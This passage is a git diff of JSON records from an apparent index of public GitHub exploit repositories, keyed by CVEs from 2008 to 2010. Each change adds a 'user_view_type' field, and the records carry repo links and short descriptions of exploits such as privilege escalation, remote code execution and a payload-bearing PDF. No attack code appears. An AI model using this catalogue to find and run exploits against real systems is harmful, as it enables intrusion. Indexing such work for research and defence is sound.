"user_view_type": "public" }, "html_url": "https:\/\/github.com\/KernelErr\/VLC-CVE-2008-4654-Exploit", "description": "An EXP could run on Windows x64 against CVE-2008-4654.", @@ -73,7 +75,8 @@ "login": "rnnsz", "id": 84464863, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84464863?v=4", - "html_url": "https:\/\/github.com\/rnnsz" + "html_url": "https:\/\/github.com\/rnnsz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rnnsz\/CVE-2008-4654", "description": null, diff --git a/2008/CVE-2008-4687.json b/2008/CVE-2008-4687.json index f596f126ed..f0ded8a95f 100644 --- a/2008/CVE-2008-4687.json +++ b/2008/CVE-2008-4687.json @@ -7,7 +7,8 @@ "login": "nmurilo", "id": 22617810, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22617810?v=4", - "html_url": "https:\/\/github.com\/nmurilo" + "html_url": "https:\/\/github.com\/nmurilo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nmurilo\/CVE-2008-4687-exploit", "description": null, @@ -37,7 +38,8 @@ "login": "twisted007", "id": 76926949, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76926949?v=4", - "html_url": "https:\/\/github.com\/twisted007" + "html_url": "https:\/\/github.com\/twisted007", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/twisted007\/mantis_rce", "description": "Python script to obtain RCE on Mantis Bug Tracker prior to version 1.2.x Check CVE-2008-4687 for additional information", diff --git a/2008/CVE-2008-5416.json b/2008/CVE-2008-5416.json index 4d6312e8e8..1465a611aa 100644 --- a/2008/CVE-2008-5416.json +++ b/2008/CVE-2008-5416.json @@ -7,7 +7,8 @@ "login": "SECFORCE", "id": 8157384, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4", - "html_url": "https:\/\/github.com\/SECFORCE" + "html_url": "https:\/\/github.com\/SECFORCE", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2008-5416", "description": "Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection", diff --git a/2008/CVE-2008-5862.json b/2008/CVE-2008-5862.json index 75828dd169..c760e8aa6b 100644 --- a/2008/CVE-2008-5862.json +++ b/2008/CVE-2008-5862.json @@ -7,7 +7,8 @@ "login": "K3ysTr0K3R", "id": 70909693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", - "html_url": "https:\/\/github.com\/K3ysTr0K3R" + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2008-5862-EXPLOIT", "description": "A PoC exploit for CVE-2008-5862 - Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410", diff --git a/2008/CVE-2008-6806.json b/2008/CVE-2008-6806.json index cb0c885a07..3d95512154 100644 --- a/2008/CVE-2008-6806.json +++ b/2008/CVE-2008-6806.json @@ -7,7 +7,8 @@ "login": "threatcode", "id": 120432727, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120432727?v=4", - "html_url": "https:\/\/github.com\/threatcode" + "html_url": "https:\/\/github.com\/threatcode", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/threatcode\/CVE-2008-6806", "description": null, diff --git a/2008/CVE-2008-6827.json b/2008/CVE-2008-6827.json index 2d0394ba95..c8091a0d8c 100644 --- a/2008/CVE-2008-6827.json +++ b/2008/CVE-2008-6827.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2008-6827", "description": "Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation", diff --git a/2008/CVE-2008-6970.json b/2008/CVE-2008-6970.json index 2de9b841f6..e796ae4956 100644 --- a/2008/CVE-2008-6970.json +++ b/2008/CVE-2008-6970.json @@ -7,7 +7,8 @@ "login": "KyomaHooin", "id": 19186867, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19186867?v=4", - "html_url": "https:\/\/github.com\/KyomaHooin" + "html_url": "https:\/\/github.com\/KyomaHooin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/KyomaHooin\/CVE-2008-6970", "description": "Blind SQL injection brute force.", diff --git a/2008/CVE-2008-7220.json b/2008/CVE-2008-7220.json index 8a059376a0..5520e6a4d0 100644 --- a/2008/CVE-2008-7220.json +++ b/2008/CVE-2008-7220.json @@ -7,7 +7,8 @@ "login": "followboy1999", "id": 4121091, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4121091?v=4", - "html_url": "https:\/\/github.com\/followboy1999" + "html_url": "https:\/\/github.com\/followboy1999", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/followboy1999\/CVE-2008-7220", "description": null, diff --git a/2009/CVE-2009-0182.json b/2009/CVE-2009-0182.json index c475efab81..6b40661ebd 100644 --- a/2009/CVE-2009-0182.json +++ b/2009/CVE-2009-0182.json @@ -7,7 +7,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2009-0182", "description": "CVE-2009-0182 VUPlayer2.49_LocalBufferOverflow", diff --git a/2009/CVE-2009-0229.json b/2009/CVE-2009-0229.json index d4701b078c..c00d5c153c 100644 --- a/2009/CVE-2009-0229.json +++ b/2009/CVE-2009-0229.json @@ -7,7 +7,8 @@ "login": "zveriu", "id": 3428446, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3428446?v=4", - "html_url": "https:\/\/github.com\/zveriu" + "html_url": "https:\/\/github.com\/zveriu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zveriu\/CVE-2009-0229-PoC", "description": "PoC for CVE-2009-0229 \"Print Spooler Read File Vulnerability\" LPE AFR (related to CVE-2020-1048)", diff --git a/2009/CVE-2009-0347.json b/2009/CVE-2009-0347.json index 9c16e50352..00ffd9c731 100644 --- a/2009/CVE-2009-0347.json +++ b/2009/CVE-2009-0347.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2009-0347", "description": "Autonomy Ultraseek - Open Redirect", diff --git a/2009/CVE-2009-0473.json b/2009/CVE-2009-0473.json index d27a7ced92..223b937db7 100644 --- a/2009/CVE-2009-0473.json +++ b/2009/CVE-2009-0473.json @@ -7,7 +7,8 @@ "login": "akbarq", "id": 7432727, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7432727?v=4", - "html_url": "https:\/\/github.com\/akbarq" + "html_url": "https:\/\/github.com\/akbarq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akbarq\/CVE-2009-0473-check", "description": "Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT\/A", diff --git a/2009/CVE-2009-0689.json b/2009/CVE-2009-0689.json index 8ffe3cbbfa..533cdbe42e 100644 --- a/2009/CVE-2009-0689.json +++ b/2009/CVE-2009-0689.json @@ -7,7 +7,8 @@ "login": "Fullmetal5", "id": 3742968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3742968?v=4", - "html_url": "https:\/\/github.com\/Fullmetal5" + "html_url": "https:\/\/github.com\/Fullmetal5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Fullmetal5\/str2hax", "description": "An implementation of CVE-2009-0689 for the Nintendo Wii.", diff --git a/2009/CVE-2009-1151.json b/2009/CVE-2009-1151.json index 17d9e71c2b..82223d4080 100644 --- a/2009/CVE-2009-1151.json +++ b/2009/CVE-2009-1151.json @@ -7,7 +7,8 @@ "login": "pagvac", "id": 6169628, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6169628?v=4", - "html_url": "https:\/\/github.com\/pagvac" + "html_url": "https:\/\/github.com\/pagvac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pagvac\/pocs", "description": "phpMyAdmin '\/scripts\/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)", @@ -37,7 +38,8 @@ "login": "e-Thug", "id": 89600679, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89600679?v=4", - "html_url": "https:\/\/github.com\/e-Thug" + "html_url": "https:\/\/github.com\/e-Thug", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/e-Thug\/PhpMyAdmin", "description": "Based on the x.pl exploit\/loader script for CVE-2009-1151", diff --git a/2009/CVE-2009-1244.json b/2009/CVE-2009-1244.json index 547e06500f..c5ed4ca9e8 100644 --- a/2009/CVE-2009-1244.json +++ b/2009/CVE-2009-1244.json @@ -7,7 +7,8 @@ "login": "piotrbania", "id": 51699228, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51699228?v=4", - "html_url": "https:\/\/github.com\/piotrbania" + "html_url": "https:\/\/github.com\/piotrbania", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/piotrbania\/vmware_exploit_pack_CVE-2009-1244", "description": "vmware cloudburst exploit CVE-2009-1244", diff --git a/2009/CVE-2009-1324.json b/2009/CVE-2009-1324.json index 1861ea73e4..dea0fccecb 100644 --- a/2009/CVE-2009-1324.json +++ b/2009/CVE-2009-1324.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-1324", "description": "CVE-2009-1324 - ASX to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3", diff --git a/2009/CVE-2009-1330.json b/2009/CVE-2009-1330.json index 12855e61e6..90b3dc2ecb 100644 --- a/2009/CVE-2009-1330.json +++ b/2009/CVE-2009-1330.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2009-1330", "description": "Simple exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows 7 32b.", @@ -37,7 +38,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-1330", "description": "CVE-2009-1330 - Easy RM to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3", @@ -67,7 +69,8 @@ "login": "exploitwritter", "id": 47488127, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", - "html_url": "https:\/\/github.com\/exploitwritter" + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2009-1330_EasyRMToMp3Converter", "description": "Easy RM to MP3 Converter es un software que sufre de una vulnerabiliad de desbordamiento de buffer basada en la pila o StackBufferOverflow lo cual puede permite a los atacantes remotos ejecutar código arbitrario a través de un nombre de archivo largo en un archivo de lista de reproducción (.pls)", diff --git a/2009/CVE-2009-1437.json b/2009/CVE-2009-1437.json index a7d98c1f30..be60830938 100644 --- a/2009/CVE-2009-1437.json +++ b/2009/CVE-2009-1437.json @@ -7,7 +7,8 @@ "login": "HanseSecure", "id": 24669088, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24669088?v=4", - "html_url": "https:\/\/github.com\/HanseSecure" + "html_url": "https:\/\/github.com\/HanseSecure", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HanseSecure\/CVE-2009-1437", "description": null, diff --git a/2009/CVE-2009-1904.json b/2009/CVE-2009-1904.json index 572aa57555..beeb84b7ee 100644 --- a/2009/CVE-2009-1904.json +++ b/2009/CVE-2009-1904.json @@ -7,7 +7,8 @@ "login": "NZKoz", "id": 197, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/197?v=4", - "html_url": "https:\/\/github.com\/NZKoz" + "html_url": "https:\/\/github.com\/NZKoz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NZKoz\/bigdecimal-segfault-fix", "description": "Provides a quick workaround for the segfault bug in Ruby (CVE-2009-1904)", diff --git a/2009/CVE-2009-2265.json b/2009/CVE-2009-2265.json index 7743c537a1..3942f90c66 100644 --- a/2009/CVE-2009-2265.json +++ b/2009/CVE-2009-2265.json @@ -7,7 +7,8 @@ "login": "zaphoxx", "id": 22231720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22231720?v=4", - "html_url": "https:\/\/github.com\/zaphoxx" + "html_url": "https:\/\/github.com\/zaphoxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zaphoxx\/zaphoxx-coldfusion", "description": "coldfusion exploit based on https:\/\/cvedetails.com\/cve\/CVE-2009-2265\/", @@ -37,7 +38,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2009-2265", "description": null, @@ -67,7 +69,8 @@ "login": "p1ckzi", "id": 44880203, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", - "html_url": "https:\/\/github.com\/p1ckzi" + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2009-2265", "description": "cf8-upload.py | CVE-2009-2265", @@ -104,7 +107,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2009-2265", "description": "ColdFusion 8.0.1 - Arbitrary File Upload to RCE", diff --git a/2009/CVE-2009-2692.json b/2009/CVE-2009-2692.json index beb2649d2b..07e0abe92d 100644 --- a/2009/CVE-2009-2692.json +++ b/2009/CVE-2009-2692.json @@ -7,7 +7,8 @@ "login": "jdvalentini", "id": 37914711, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37914711?v=4", - "html_url": "https:\/\/github.com\/jdvalentini" + "html_url": "https:\/\/github.com\/jdvalentini", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jdvalentini\/CVE-2009-2692", "description": "Linux Null pointer dereference", diff --git a/2009/CVE-2009-2698.json b/2009/CVE-2009-2698.json index 2e0fa97df0..3d52d3f160 100644 --- a/2009/CVE-2009-2698.json +++ b/2009/CVE-2009-2698.json @@ -7,7 +7,8 @@ "login": "xiaoxiaoleo", "id": 9813186, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9813186?v=4", - "html_url": "https:\/\/github.com\/xiaoxiaoleo" + "html_url": "https:\/\/github.com\/xiaoxiaoleo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xiaoxiaoleo\/CVE-2009-2698", "description": "CVE-2009-2698 compiled for CentOS 4.8", diff --git a/2009/CVE-2009-3036.json b/2009/CVE-2009-3036.json index 2d873ecf77..c04f5850d9 100644 --- a/2009/CVE-2009-3036.json +++ b/2009/CVE-2009-3036.json @@ -7,7 +7,8 @@ "login": "brinhosa", "id": 1003952, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1003952?v=4", - "html_url": "https:\/\/github.com\/brinhosa" + "html_url": "https:\/\/github.com\/brinhosa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/brinhosa\/CVE-2009-3036", "description": null, diff --git a/2009/CVE-2009-3103.json b/2009/CVE-2009-3103.json index 3b3a3d6aef..22222078af 100644 --- a/2009/CVE-2009-3103.json +++ b/2009/CVE-2009-3103.json @@ -7,7 +7,8 @@ "login": "sooklalad", "id": 16028654, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16028654?v=4", - "html_url": "https:\/\/github.com\/sooklalad" + "html_url": "https:\/\/github.com\/sooklalad", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sooklalad\/ms09050", "description": "cve-2009-3103", @@ -37,7 +38,8 @@ "login": "sec13b", "id": 123419537, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123419537?v=4", - "html_url": "https:\/\/github.com\/sec13b" + "html_url": "https:\/\/github.com\/sec13b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sec13b\/ms09-050_CVE-2009-3103", "description": "CVE-2009-3103 ms09-050", @@ -67,7 +69,8 @@ "login": "Sic4rio", "id": 75425513, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75425513?v=4", - "html_url": "https:\/\/github.com\/Sic4rio" + "html_url": "https:\/\/github.com\/Sic4rio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sic4rio\/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-", "description": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)", diff --git a/2009/CVE-2009-3555.json b/2009/CVE-2009-3555.json index ceee9e9460..a19580d27b 100644 --- a/2009/CVE-2009-3555.json +++ b/2009/CVE-2009-3555.json @@ -7,7 +7,8 @@ "login": "johnwchadwick", "id": 86682572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86682572?v=4", - "html_url": "https:\/\/github.com\/johnwchadwick" + "html_url": "https:\/\/github.com\/johnwchadwick", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/johnwchadwick\/cve-2009-3555-test-server", "description": "A TLS server using a vendored fork of the Go TLS stack that has renegotation indication extension forcibly disabled.", diff --git a/2009/CVE-2009-4049.json b/2009/CVE-2009-4049.json index c9d2df26ff..489016e854 100644 --- a/2009/CVE-2009-4049.json +++ b/2009/CVE-2009-4049.json @@ -7,7 +7,8 @@ "login": "fengjixuchui", "id": 2487206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", - "html_url": "https:\/\/github.com\/fengjixuchui" + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2009-4049", "description": "Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.", diff --git a/2009/CVE-2009-4092.json b/2009/CVE-2009-4092.json index 1dc6d50aa0..e035972015 100644 --- a/2009/CVE-2009-4092.json +++ b/2009/CVE-2009-4092.json @@ -7,7 +7,8 @@ "login": "xiaoyu-iid", "id": 22065479, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22065479?v=4", - "html_url": "https:\/\/github.com\/xiaoyu-iid" + "html_url": "https:\/\/github.com\/xiaoyu-iid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xiaoyu-iid\/Simplog-Exploit", "description": "Setup, exploit and patch for CVE-2009-4092 Simplog CSRF", diff --git a/2009/CVE-2009-4118.json b/2009/CVE-2009-4118.json index 40abbeb67b..8462bff4a6 100644 --- a/2009/CVE-2009-4118.json +++ b/2009/CVE-2009-4118.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2009-4118", "description": "Cisco VPN Client - Integer Overflow Denial of Service", diff --git a/2009/CVE-2009-4137.json b/2009/CVE-2009-4137.json index 99c156e071..57ac37fcc4 100644 --- a/2009/CVE-2009-4137.json +++ b/2009/CVE-2009-4137.json @@ -7,7 +7,8 @@ "login": "Alexeyan", "id": 6674109, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6674109?v=4", - "html_url": "https:\/\/github.com\/Alexeyan" + "html_url": "https:\/\/github.com\/Alexeyan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Alexeyan\/CVE-2009-4137", "description": "Exploit for piwik CVE-2009-4140 RCE", diff --git a/2009/CVE-2009-4623.json b/2009/CVE-2009-4623.json index bd6f8bb876..384e7e0cf3 100644 --- a/2009/CVE-2009-4623.json +++ b/2009/CVE-2009-4623.json @@ -7,7 +7,8 @@ "login": "hupe1980", "id": 24973437, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", - "html_url": "https:\/\/github.com\/hupe1980" + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hupe1980\/CVE-2009-4623", "description": "Advanced Comment System 1.0 - Remote Command Execution (RCE) ", @@ -39,7 +40,8 @@ "login": "kernel-cyber", "id": 21226709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4", - "html_url": "https:\/\/github.com\/kernel-cyber" + "html_url": "https:\/\/github.com\/kernel-cyber", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2009-4623", "description": null, @@ -69,7 +71,8 @@ "login": "MonsempesSamuel", "id": 45665836, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45665836?v=4", - "html_url": "https:\/\/github.com\/MonsempesSamuel" + "html_url": "https:\/\/github.com\/MonsempesSamuel", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MonsempesSamuel\/CVE-2009-4623", "description": "Remote shell on CVE-2009-4623", diff --git a/2009/CVE-2009-4660.json b/2009/CVE-2009-4660.json index 91f2ea2ecc..5e3b511d56 100644 --- a/2009/CVE-2009-4660.json +++ b/2009/CVE-2009-4660.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-4660", "description": "CVE-2009-4660 - BigAnt Server 2.52 'USV' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2009/CVE-2009-5147.json b/2009/CVE-2009-5147.json index 62a3b8ae71..f72eb7e084 100644 --- a/2009/CVE-2009-5147.json +++ b/2009/CVE-2009-5147.json @@ -7,7 +7,8 @@ "login": "vpereira", "id": 37418, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37418?v=4", - "html_url": "https:\/\/github.com\/vpereira" + "html_url": "https:\/\/github.com\/vpereira", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vpereira\/CVE-2009-5147", "description": "poc for CVE-2009-5147", @@ -37,7 +38,8 @@ "login": "zhangyongbo100", "id": 49974023, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49974023?v=4", - "html_url": "https:\/\/github.com\/zhangyongbo100" + "html_url": "https:\/\/github.com\/zhangyongbo100", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangyongbo100\/-Ruby-dl-handle.c-CVE-2009-5147-", "description": null, diff --git a/2010/CVE-2010-0219.json b/2010/CVE-2010-0219.json index 47a7d31da6..bc3c47f550 100644 --- a/2010/CVE-2010-0219.json +++ b/2010/CVE-2010-0219.json @@ -7,7 +7,8 @@ "login": "veritas-rt", "id": 50308392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50308392?v=4", - "html_url": "https:\/\/github.com\/veritas-rt" + "html_url": "https:\/\/github.com\/veritas-rt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/veritas-rt\/CVE-2010-0219", "description": null, diff --git a/2010/CVE-2010-0232.json b/2010/CVE-2010-0232.json index 7b34e46101..5b02d1a44f 100644 --- a/2010/CVE-2010-0232.json +++ b/2010/CVE-2010-0232.json @@ -7,7 +7,8 @@ "login": "azorfus", "id": 72391760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72391760?v=4", - "html_url": "https:\/\/github.com\/azorfus" + "html_url": "https:\/\/github.com\/azorfus", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/azorfus\/CVE-2010-0232", "description": "Development of an exploit for privilege escalation in Windows systems ( NT \/ 2k \/ XP \/ 2K3 \/ VISTA \/ 2k8 \/ 7 ) using the vulnerability CVE-2010-0232", diff --git a/2010/CVE-2010-0426.json b/2010/CVE-2010-0426.json index ff7a7f065d..1f8d880e08 100644 --- a/2010/CVE-2010-0426.json +++ b/2010/CVE-2010-0426.json @@ -7,7 +7,8 @@ "login": "t0kx", "id": 24924517, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24924517?v=4", - "html_url": "https:\/\/github.com\/t0kx" + "html_url": "https:\/\/github.com\/t0kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/t0kx\/privesc-CVE-2010-0426", "description": "Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Local Privilege Escalation and vulnerable container", @@ -44,7 +45,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2010-0426", "description": "cve-2010-0426", @@ -74,7 +76,8 @@ "login": "g1vi", "id": 120142960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", - "html_url": "https:\/\/github.com\/g1vi" + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g1vi\/CVE-2010-0426", "description": "sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Privilege escalation with sudo and sudoedit", diff --git a/2010/CVE-2010-0738.json b/2010/CVE-2010-0738.json index c239bba8ff..173ced9021 100644 --- a/2010/CVE-2010-0738.json +++ b/2010/CVE-2010-0738.json @@ -7,7 +7,8 @@ "login": "ChristianPapathanasiou", "id": 5354349, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5354349?v=4", - "html_url": "https:\/\/github.com\/ChristianPapathanasiou" + "html_url": "https:\/\/github.com\/ChristianPapathanasiou", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ChristianPapathanasiou\/jboss-autopwn", "description": "JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security", @@ -37,7 +38,8 @@ "login": "gitcollect", "id": 17906239, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17906239?v=4", - "html_url": "https:\/\/github.com\/gitcollect" + "html_url": "https:\/\/github.com\/gitcollect", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gitcollect\/jboss-autopwn", "description": "JBoss Autopwn CVE-2010-0738 JBoss authentication bypass ", diff --git a/2010/CVE-2010-1205.json b/2010/CVE-2010-1205.json index 28f364788b..215f7943af 100644 --- a/2010/CVE-2010-1205.json +++ b/2010/CVE-2010-1205.json @@ -7,7 +7,8 @@ "login": "mk219533", "id": 91629, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91629?v=4", - "html_url": "https:\/\/github.com\/mk219533" + "html_url": "https:\/\/github.com\/mk219533", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mk219533\/CVE-2010-1205", "description": "sample exploit of buffer overflow in libpng ", diff --git a/2010/CVE-2010-1240.json b/2010/CVE-2010-1240.json index beacda6453..92a46965c8 100644 --- a/2010/CVE-2010-1240.json +++ b/2010/CVE-2010-1240.json @@ -7,7 +7,8 @@ "login": "Jasmoon99", "id": 45911474, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45911474?v=4", - "html_url": "https:\/\/github.com\/Jasmoon99" + "html_url": "https:\/\/github.com\/Jasmoon99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jasmoon99\/Embedded-PDF", "description": "This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. ", @@ -37,7 +38,8 @@ "login": "omarothmann", "id": 43515806, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43515806?v=4", - "html_url": "https:\/\/github.com\/omarothmann" + "html_url": "https:\/\/github.com\/omarothmann", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/omarothmann\/Embedded-Backdoor-Connection", "description": "This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240.", @@ -67,7 +69,8 @@ "login": "asepsaepdin", "id": 122620685, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", - "html_url": "https:\/\/github.com\/asepsaepdin" + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2010-1240", "description": null, 